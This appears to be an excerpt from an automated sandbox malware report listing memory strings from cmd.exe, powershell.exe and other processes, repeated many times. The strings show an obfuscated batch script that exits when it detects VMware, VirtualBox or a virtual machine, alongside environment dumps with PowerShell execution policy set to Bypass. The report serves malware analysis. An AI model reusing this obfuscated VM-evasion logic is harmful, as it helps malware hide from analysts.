Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=O"
Source: chcp.com, 00000017.00000002.1444645176.0000020FEB7D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=O=
Source: cmd.exe, 0000000B.00000003.1440670625.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=O\|FS0
Source: cmd.exe, 0000000B.00000003.1425656707.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o
Source: cmd.exe, 0000000B.00000003.1407515269.000002C1DCA52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kwindir=C:\Windows
Source: cvtres.exe, 00000020.00000002.1489088205.0000021DA0054000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%pRRskkyxH%TxdoRBmbqzyDVqyq%PgoZqotPpEsJcYkgv%oIMCIYPcwKpRXwK%hZOpTayxjdmkYSTjwD%isoMMZLfuBkSCvSyyG%qCQhJEFampksrwfrH%CijJlvWCTruCJCKdl%fqmJILLziDUrkvnqn%kmYFUdkjVrRsAkRgE%ObkWUkGgYulxXHBAg%oRwulXKHtPlwIBGZgl%urTGZNVgFfZlhAgG%CRTkCOGlG%"=="Microsoft Corporation" if "%qZeNCZQ%wmXNiBYbPdfGrqJTw%zryaeCiiDdiFTXMmAh%QVIQwReasfWDTDlvM%AgRBROmTOtYYoineiSN%dYnsVHrFmacxxSXvQ%tWLEIVCk%"=="Virtual Machine" exit\nif "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit n=cn1=Cnumber_of_processors=2o=do1=Donedrive=C:\Users\user\OneDriveos=Windows_NTp=ep1=Epath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;pathext=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLprocessor_architecture=AMD64processor_identifier=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelprocessor_level=6processor_revision=8f08programdata=C:\ProgramDataprogramfiles=C:\Program Filesprogramfiles(x86)=C:\Program Files (x86)programw6432=C:\Program Filesprompt=$P$Gpsexecutionpolicypreference=Bypasspsmodulepath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXpublic=C:\Users\Publicq=fq1=Fr=gr1=Gs=hs1=Hsessionname=Consolesystemdrive=C:systemroot=C:\Windowst=it1=Itemp=C:\Users\user~1\AppData\Local\Temptmp=C:\Users\user~1\AppData\Local\Tempu=ju1=Juserdomain=user-PCuserdomain_roamingprofile=user-PCusername=useruserprofile=C:\Users\userv=kv1=Kw=lw1=Lwindir=C:\Windowsx=mx1=My=ny1=Nz=oz1=O_clrrestrictsecattributes=1V
Source: cmd.exe, 0000000B.00000003.1432761439.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=my=nz=oz
Source: cmd.exe, 0000000B.00000003.1414389145.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=oaa
Source: cmd.exe, 0000000B.00000003.1413132223.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=oL
Source: powershell.exe, 00000033.00000002.1811615016.000002B20050D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: cmd.exe, 0000000B.00000003.1408115597.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\WindowszQjwlAy
Source: cmd.exe, 0000000B.00000003.1408115597.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif 